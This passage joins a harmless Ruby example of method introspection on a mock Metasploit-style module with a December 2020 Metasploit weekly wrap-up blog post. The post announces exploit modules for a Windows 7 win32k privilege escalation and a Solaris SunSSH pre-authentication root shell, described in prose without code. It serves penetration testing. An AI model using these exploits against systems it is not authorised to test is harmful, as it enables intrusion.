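# Added example, not Metasploit Framework code: the introspection calls listed
# above run against a constructed class that is assembled from mixins the way a
# Metasploit module is. All names here are hypothetical.

module TcpMixin
  def connect
    :connected
  end
end

module HttpClientMixin
  include TcpMixin

  def send_request_raw(path)
    "GET #{path}"
  end

  def send_request_cgi(opts = {})
    send_request_raw(opts.fetch(:uri, '/'))
  end
end

class ExampleModule
  include HttpClientMixin

  def run
    # At a breakpoint here (require 'pry'; binding.pry), `self` is this
    # ExampleModule instance and the helpers below reproduce what the
    # introspection calls would show.
    send_request_cgi(uri: '/login')
  end
end

# self.methods.grep(pattern): which methods does this object respond to?
def methods_matching(obj, pattern)
  obj.methods.grep(pattern).sort
end

# self.method(:name).source_location: which file and line defined a method,
# including methods that arrived through a mixin (owner tells you which one).
def where_defined(obj, name)
  meth = obj.method(name)
  file, line = meth.source_location
  { file: file, line: line, owner: meth.owner }
end

# self.class.ancestors: the lookup chain, listing every mixin in the order
# Ruby consults them. Only the part below Object is kept for readability.
def mixins_of(obj)
  obj.class.ancestors.take_while { |a| a != Object }
end

if $PROGRAM_NAME == __FILE__
  m = ExampleModule.new
  puts m.run
  p methods_matching(m, /\Asend_request/)
  p where_defined(m, :connect)
  p mixins_of(m)
end
```

The owner field is the piece that usually answers "where does this method come from?" on a real module: source_location gives the file and line, and owner names the mixin that contributed it, which is what you would otherwise have to dig out of the ancestors list by hand.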

Even more tips!

Did you know that the Metasploit console has an inbuilt tips command? It will show you even more useful workflow tips to check out! See any tips that we’re missing? Simply create a pull request to help us improve the list.


Metasploit Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2020/12/18/metasploit-wrap-up-92/


It’s the week of December 17th and that can only mean one thing: a week until Christmas! For those of you who don’t celebrate Christmas, a very happy Hanukkah/Chanukah, Kwanzaa, Diwali, Chinese New Year, Winter Solstice and Las Posadas to you all!

This is our last weekly wrap-up this year, but as always, we’ll be publishing an annual Metasploit wrap-up just after the new year that covers all the shells we got in 2020.

Without further ado, let’s jump into it!

CVE-2020-1054: I heard you still got Windows 7, so let’s play a game

Oh dear Windows 7, you just can’t catch a break. timwr continued his LPE contributions this week with an exploit for CVE-2020-1054, an out-of-bounds (OOB) write vulnerability via the DrawIconEx() function in win32k.sys. This bug was originally found by bee13oy of Qihoo 360 Vulcan Team and by Netanel Ben-Simon and Yoav Alon of Check Point Research, and was reported to Microsoft in May 2020. The module targets Windows 7 SP1 x64 and grants SYSTEM-level code execution. Whilst Windows 7 is EOL, it is still being used by 17.68% of all Windows computers as of November 2020 according to some statistics. That is still a fair market share, even if its popularity has been gradually diminishing over time. Furthermore, although users can still update Windows 7, it is now mostly a manual process unless you are on one of the Windows extended support plans. This increases the time needed to apply patches and also increases the possibility that users may forget to install specific patches. Hopefully none of your clients’ systems are still running Windows 7, but in case you are on a pen test and happen to encounter one, this exploit might provide the access you need to pivot further into the network.

Parse me to your shell

The second highlight of this week was a PR from our very own wvu-r7 targeting CVE-2020-14871, a buffer overflow within the parse_user_name() function of the PAM (Pluggable Authentication Module) component of SunSSH running on Oracle Solaris versions 10 and 11. The exploit supports SunSSH 1.1.5 running on Solaris 10u11 1/13 (x86) within either VMware or VirtualBox and grants unauthenticated users a shell as the root user. Pretty nifty stuff!

New modules (2)

Enhancements and features

Bugs fixed

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).